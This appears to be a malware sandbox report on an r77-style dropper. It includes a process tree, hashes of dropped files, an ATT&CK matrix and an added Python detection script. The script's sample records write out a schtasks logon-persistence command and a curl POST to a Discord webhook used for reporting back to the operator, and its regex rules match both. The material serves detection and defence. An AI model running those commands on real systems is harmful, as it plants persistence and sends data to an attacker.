  • Suspicious behavior: EnumeratesProcesses
  PID:4848
• C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  PID:3756
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  • Checks processor information in registry
  PID:2200
• C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  • Checks processor information in registry
  • Enumerates system info in registry
  • Modifies data under HKEY_USERS
  PID:3996
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
  PID:4768
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  PID:2172
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  PID:2800
• C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  • Drops file in Windows directory
  PID:2248
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID:4416
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  PID:4416
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  PID:232
• C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  PID:1724
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3292
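The dropper's subtree above carries the whole persistence and reporting chain in three command lines: schtasks /create with /sc onlogon and /rl highest, whose action is the copy under %AppData%\Roaming\$77-aachost.exe; cmd.exe running tmp3F0C.tmp.bat from %TEMP% with a timeout 3 before relaunching; and a 32-bit curl.exe posting to a Discord webhook with headers that imitate the Discohook web client. The webhook body is not stolen data but a .NET stack trace from Dropper.Dropping.Main(): the dropper appended %userprofile% (already expanded to C:\Users\Admin by the time cmd handed the line to curl) onto its Temp path, so the write of test.exe failed, and the failure was reported to the operator. The webhook ID and token sit in the command line in the clear, so the webhook can be reported or blocked by its ID. The $77- prefix on every dropped file is the naming convention the r77 rootkit uses to hide files and processes, which makes it worth a rule of its own. The Python below is an added detection example written for this page, not part of the sandbox report or the sample. It assumes process-creation records in the shape Sysmon Event ID 1 provides (image, command line, PID); the records are constructed to mirror the tree, with a placeholder webhook ID and token in place of the real ones.

```python
"""Added detection example for the dropper subtree: rules over process-creation
records (image, command line, PID). The record shape follows Sysmon Event ID 1
(an assumption, not something the report states); the records are constructed
to mirror the tree, and the webhook ID and token are placeholders."""
import re

# Constructed sample records modelled on the sandbox process tree.
SAMPLE_EVENTS = [
    {"pid": 464, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit'''},
    {"pid": 2196, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r"""schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'"""},
    {"pid": 2336, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'''C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F0C.tmp.bat""'''},
    {"pid": 2764, "image": r"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe",
     "cmdline": r'''"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"'''},
    {"pid": 608, "image": r"C:\Windows\SysWOW64\curl.exe",
     "cmdline": r'''curl "https://discord.com/api/webhooks/1111111111111111111/PLACEHOLDER_TOKEN" -X POST -H "Content-Type: application/json" --data-raw "{""content"":""System.IO.DirectoryNotFoundException""}"'''},
    {"pid": 3636, "image": r"C:\Windows\system32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"},
]

RULES = {
    # schtasks /create with an at-logon trigger at the highest run level
    # (T1053.005); the lookaheads make the /sc and /rl order irrelevant.
    "T1053.005 logon task at highest run level": re.compile(
        r"\bschtasks(?:\.exe)?\b.*?/create\b(?=.*\s/sc\s+onlogon\b)(?=.*\s/rl\s+highest\b)", re.I),
    # The task action (/tr) launches something under the user's roaming AppData.
    "task action under AppData Roaming": re.compile(
        r"/tr\s+['\"]*[^'\"]*\\AppData\\Roaming\\", re.I),
    # cmd.exe executing a tmpXXXX.tmp.bat staged in %TEMP%.
    "cmd.exe runs tmpXXXX.tmp.bat from TEMP": re.compile(
        r"\bcmd(?:\.exe)?\b.*\\AppData\\Local\\Temp\\tmp[0-9A-F]{4}\.tmp\.bat", re.I),
    # curl.exe talking to a Discord webhook endpoint.
    "curl.exe posts to a Discord webhook": re.compile(
        r"\bcurl(?:\.exe)?\b.*discord\.com/api/webhooks/\d+/", re.I),
    # A path component starting with $77-, the prefix r77 hides by default.
    "$77- file name prefix": re.compile(r"\\\$77-[^\\\"']+", re.I),
}


def classify(event):
    """Names of the rules whose pattern matches the record's command line."""
    return [name for name, pat in RULES.items() if pat.search(event["cmdline"])]


def extract_webhook_ids(cmdline):
    """Numeric Discord webhook IDs in a command line. The ID alone is enough to
    report or block the webhook; the secret token is deliberately not returned."""
    return re.findall(r"discord\.com/api/webhooks/(\d+)/", cmdline)


def scan(events):
    """Map every PID that hits at least one rule to the list of matched rule names."""
    hits = {}
    for ev in events:
        names = classify(ev)
        if names:
            hits[ev["pid"]] = names
    return hits


if __name__ == "__main__":
    for pid, names in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(names))
    for ev in SAMPLE_EVENTS:
        for wid in extract_webhook_ids(ev["cmdline"]):
            print("webhook id to report or block:", wid)
```

Run stand-alone it lists the matched rule names per PID (the schtasks pair hits three rules, the svchost record none) and the webhook ID to act on; the same five patterns carry over unchanged into a process-creation query in whatever SIEM is in use.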

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                    Execution

                                                                                                                                    Scheduled Task/Job

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053.005

                                                                                                                                    Persistence

                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                    2
                                                                                                                                    T1547

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    2
                                                                                                                                    T1547.001

                                                                                                                                    Scheduled Task/Job

                                                                                                                                    1
                                                                                                                                    T1053

                                                                                                                                    Scheduled Task

                                                                                                                                    1
                                                                                                                                    T1053.005

Privilege Escalation
  Boot or Logon Autostart Execution     2    T1547
  Registry Run Keys / Startup Folder    2    T1547.001
  Scheduled Task/Job                    1    T1053
  Scheduled Task                        1    T1053.005

Defense Evasion
  Modify Registry                       3    T1112

Discovery
  Query Registry                        7    T1012
  System Information Discovery          6    T1082
  Peripheral Device Discovery           1    T1120

Command and Control
  Web Service                           1    T1102


                                                                                                                                    Downloads

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Filesize  328B
  MD5       65b30af4c332dfa8dad22fc10c6c2b67
  SHA1      dea38eecdfe1e1daf6b5ae794ad68a1c1b85a6f8
  SHA256    6363beeb50abf637cdcd3f692475398cbce7ab2283b0cba3e1a398d4a049d171
  SHA512    7bc7cde62b1cb46ac4675d9c60a48a016bc727edc947dccaa63300da46a1fcaa645a092da54c3e095b7bd595644d4a2b174b88ed5ab6228205768782787e7f9e

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
  Filesize  654B
  MD5       2ff39f6c7249774be85fd60a8f9a245e
  SHA1      684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

• C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize  66KB
  MD5       f10712f4faa374be8f37668c5ebed4a6
  SHA1      bb30e941c4f91ae3178539e993abecbfd838fdb0
  SHA256    d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
  SHA512    cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac

• C:\Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize  163KB
  MD5       1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1      2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256    b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512    859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

• C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize  256KB
  MD5       18f497deffe88b6b2cff336a277aface
  SHA1      4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256    8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512    35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

• C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize  50KB
  MD5       77a71f3a441aa3bf824967e52413bec5
  SHA1      c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
  SHA256    1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
  SHA512    31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

• C:\Users\Admin\AppData\Local\Temp\tmp3F0C.tmp.bat
  Filesize  155B
  MD5       3c5f2a140fe547a17a0eb89dabaa503c
  SHA1      bc2d2a428b77a3d7dc64ac335a6a23bff6ae64fd
  SHA256    66f0732011fdc087220133e47c1d83e21e95b5bfdfc8c32a6943ea36dd1d79ff
  SHA512    03c62fbb52adf4567d15bbb234d8daa139c22ee1d4f77f74b67ee9a01ba9adaad88c957a8cee8f8ff3a44241b53dac284597413f1bacfa009b55032d1b5759ba

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize  2KB
  MD5       8abf2d6067c6f3191a015f84aa9b6efe
  SHA1      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
  SHA256    ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
  SHA512    c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize  2KB
  MD5       f313c5b4f95605026428425586317353
  SHA1      06be66fa06e1cffc54459c38d3d258f46669d01a
  SHA256    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
  SHA512    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize  2KB
  MD5       ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1      a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize  2KB
  MD5       7d612892b20e70250dbd00d0cdd4f09b
  SHA1      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize  2KB
  MD5       1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1      5fd0a67671430f66237f483eef39ff599b892272
  SHA256    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize  2KB
  MD5       0b990e24f1e839462c0ac35fef1d119e
  SHA1      9e17905f8f68f9ce0a2024d57b537aa8b39c6708
  SHA256    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
  SHA512    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

• C:\Windows\Temp\__PSScriptPolicyTest_ddew5a3k.lrc.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• memory/336-287-0x00000229032F0000-0x000002290331B000-memory.dmp
  Filesize  172KB

• memory/336-294-0x00007FFAA2490000-0x00007FFAA24A0000-memory.dmp
  Filesize  64KB

• memory/336-293-0x00000229032F0000-0x000002290331B000-memory.dmp
  Filesize  172KB

• memory/532-298-0x000001E707970000-0x000001E70799B000-memory.dmp
  Filesize  172KB

• memory/616-254-0x000001C5D9A00000-0x000001C5D9A2B000-memory.dmp
  Filesize  172KB

• memory/616-261-0x00007FFAA2490000-0x00007FFAA24A0000-memory.dmp
  Filesize  64KB

• memory/616-253-0x000001C5D9A00000-0x000001C5D9A2B000-memory.dmp
  Filesize  172KB

• memory/616-260-0x000001C5D9A00000-0x000001C5D9A2B000-memory.dmp
  Filesize  172KB

                                                                                                                                    • memory/616-252-0x000001C5D99D0000-0x000001C5D99F5000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      148KB

                                                                                                                                    • memory/668-271-0x0000017677530000-0x000001767755B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/668-265-0x0000017677530000-0x000001767755B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/668-272-0x00007FFAA2490000-0x00007FFAA24A0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/956-282-0x000001EBA5BD0000-0x000001EBA5BFB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/956-283-0x00007FFAA2490000-0x00007FFAA24A0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/956-276-0x000001EBA5BD0000-0x000001EBA5BFB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/2764-188-0x00000000002F0000-0x0000000000336000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      280KB

                                                                                                                                    • memory/2764-212-0x0000000002390000-0x0000000002396000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                    • memory/2764-1160-0x000000001C5D0000-0x000000001C646000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      472KB

                                                                                                                                    • memory/3236-237-0x00007FFAE2410000-0x00007FFAE2605000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/3236-230-0x000002726B380000-0x000002726B3A2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/3236-238-0x00007FFAE2300000-0x00007FFAE23BE000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/3236-236-0x000002726B830000-0x000002726B85A000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/3556-1-0x0000000000CF0000-0x0000000000E60000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                    • memory/3556-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3656-65-0x00007FFAC3663000-0x00007FFAC3665000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/3656-1261-0x00007FFAC3660000-0x00007FFAC4121000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/3656-113-0x0000000000F80000-0x0000000000F92000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/3656-1041-0x00007FFAC3660000-0x00007FFAC4121000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/4008-127-0x0000000000F10000-0x0000000000F26000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/4740-241-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-240-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-239-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-244-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-249-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-242-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4740-246-0x00007FFAE2300000-0x00007FFAE23BE000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/4740-245-0x00007FFAE2410000-0x00007FFAE2605000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      2.0MB